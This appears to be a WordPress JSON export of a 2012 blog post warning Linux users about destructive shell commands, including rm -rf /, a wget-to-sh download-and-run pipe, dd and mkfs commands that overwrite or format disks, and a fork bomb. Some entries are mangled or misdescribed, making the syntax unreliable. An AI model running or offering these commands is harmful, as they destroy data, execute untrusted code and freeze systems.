{"id":592,"date":"2012-10-11T16:00:32","date_gmt":"2012-10-11T16:00:32","guid":{"rendered":"http:\/\/jeeskdenny.com\/blog\/?p=592"},"modified":"2012-10-11T16:03:58","modified_gmt":"2012-10-11T16:03:58","slug":"linux-killer-commands","status":"publish","type":"post","link":"http:\/\/jeeskdenny.com\/blog\/linux-killer-commands\/","title":{"rendered":"Linux Killer Commands"},"content":{"rendered":"<p>Are you familiar with using LINUX? You must use it. Have you ever felt the power of the Linux? But you should because once you\u2019ve used it with interest; you\u2019ll definitely become a fan of LINUX. One of the reasons for the attraction is its command sections. When compared to Windows or Mac, LINUX powered computers bears a large number of commands by which you could do various activities as well as programming a little. But some of LINUX commands are very much hazardous to our PC than we expect and that\u2019s why they\u2019re called Linux Killer Commands.<\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/jeeskdenny.com\/blog\/wp-content\/uploads\/2012\/10\/Linux-Tux.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-593\" title=\"Linux Tux\" src=\"http:\/\/jeeskdenny.com\/blog\/wp-content\/uploads\/2012\/10\/Linux-Tux.jpg\" alt=\"\" width=\"400\" height=\"297\" srcset=\"http:\/\/jeeskdenny.com\/blog\/wp-content\/uploads\/2012\/10\/Linux-Tux.jpg 400w, http:\/\/jeeskdenny.com\/blog\/wp-content\/uploads\/2012\/10\/Linux-Tux-300x223.jpg 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p>Here, let us discuss about such killer commands. Before that first of all you must know about the extra power of the Linux and crucial role of commands in Linux. In a simple word we can say that, the Linux is an operating system.<\/p>\n<ul>\n<li>People like to use Linux on their home and used to work on computers, because of its extra stability and flexibility.<\/li>\n<li>It is used especially to run the Internet. Linux is based on\u00a0UNIX.UNIX is an operating\u00a0system that developed in the early 1970s and which is still used widely today. Linux is used both to run parts of the Internet, as well as to run small and large networks in corporations, offices and homes.<\/li>\n<li>Since Linux is highly stable, well secure and robust, it is perfect for storing huge databases of information.<\/li>\n<\/ul>\n<div>\n<p>Now, let\u2019s jump to the list and description of KILLER COMMANDS in Linux Based Operating Systems. Keep one thing in mind that you must not try any of these commands because it could damage your OS, Hard Drive, or PC itself.<\/p>\n<\/div>\n<h2>rm-rf \/<\/h2>\n<p>It deletes everything! this command\u00a0will delete everything that it can. It includes\u00a0files\u00a0on your hard drive\u00a0as well as\u00a0files on the connected removable media devices. Like a good soldier Linux will obey this command perfectly, that means it deletes everything. So please don\u2019t run weird-looking, obviously disguised commands that you don\u2019t understand.<\/p>\n<h2>wget http:\/\/example.com\/something-O\u2013|sh-<\/h2>\n<p>It downloads and Runs a Script. The code that written in above line first downloads a script from the web and after it sends the file to sh, which executes the contents of the script. This becomes more dangerous if you\u2019re not sure what the script is or if you don\u2019t trust its source of that script.<\/p>\n<h2>dd if=\/dev\/random of=\/dev\/sda<\/h2>\n<p>This command will write junk onto your hard drive. \u00a0dd copies the data from one location to another, which can be dangerous if you\u2019re copying directly to a device.<\/p>\n<h2>mkfs.ext4 \/dev\/sda1<\/h2>\n<p>Typing this command, it formats your Hard Drive. In other word, this command can be equivalent to running format C Drive where you used to Install your OS.<\/p>\n<h2>mkfs.ext3 \/dev\/sdb2<\/h2>\n<p>This command can come in other forms of the above command. Which means the command could remove the second partition.<\/p>\n<h2>\/dev\/sda1<\/h2>\n<p>Specifies the first partition on the first hard drive, which is probably in use.<\/p>\n<h2>\/dev\/sda<\/h2>\n<p>This command writes directly to your hard drive.<\/p>\n<h2>:(){ :|: &amp; };: \u2013<\/h2>\n<div>\n<p>A Fork Bomb; this line looks very simple, but remembers it is quite dangerous. It\u00a0defines a shell function that creates new copies of itself. The process continually replicates itself. After that its copies continually replicate themselves, quickly taking up all your CPU time and memory.\u00a0 Later it leads your computer to freeze. It\u2019s basically a denial-of-service attack.<\/p>\n<\/div>\n<p>So please don\u2019t download and run untrusted scripts from the web, even with a command. \u00a0Beware of running commands directly on your hard disk devices that begin with \/dev\/sd. Hope you now know what Linux Commands can actually do on your PC.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Are you familiar with using LINUX? You must use it. Have you ever felt the power of the Linux? But<\/p>\n","protected":false},"author":1,"featured_media":593,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[1],"tags":[211,212,210,178],"class_list":["post-592","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-technology","tag-commands","tag-kill","tag-killer","tag-linux"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"http:\/\/jeeskdenny.com\/blog\/wp-content\/uploads\/2012\/10\/Linux-Tux.jpg","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p8gP8w-9y","jetpack_likes_enabled":true,"_links":{"self":[{"href":"http:\/\/jeeskdenny.com\/blog\/wp-json\/wp\/v2\/posts\/592","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/jeeskdenny.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/jeeskdenny.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/jeeskdenny.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/jeeskdenny.com\/blog\/wp-json\/wp\/v2\/comments?post=592"}],"version-history":[{"count":4,"href":"http:\/\/jeeskdenny.com\/blog\/wp-json\/wp\/v2\/posts\/592\/revisions"}],"predecessor-version":[{"id":597,"href":"http:\/\/jeeskdenny.com\/blog\/wp-json\/wp\/v2\/posts\/592\/revisions\/597"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/jeeskdenny.com\/blog\/wp-json\/wp\/v2\/media\/593"}],"wp:attachment":[{"href":"http:\/\/jeeskdenny.com\/blog\/wp-json\/wp\/v2\/media?parent=592"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/jeeskdenny.com\/blog\/wp-json\/wp\/v2\/categories?post=592"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/jeeskdenny.com\/blog\/wp-json\/wp\/v2\/tags?post=592"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}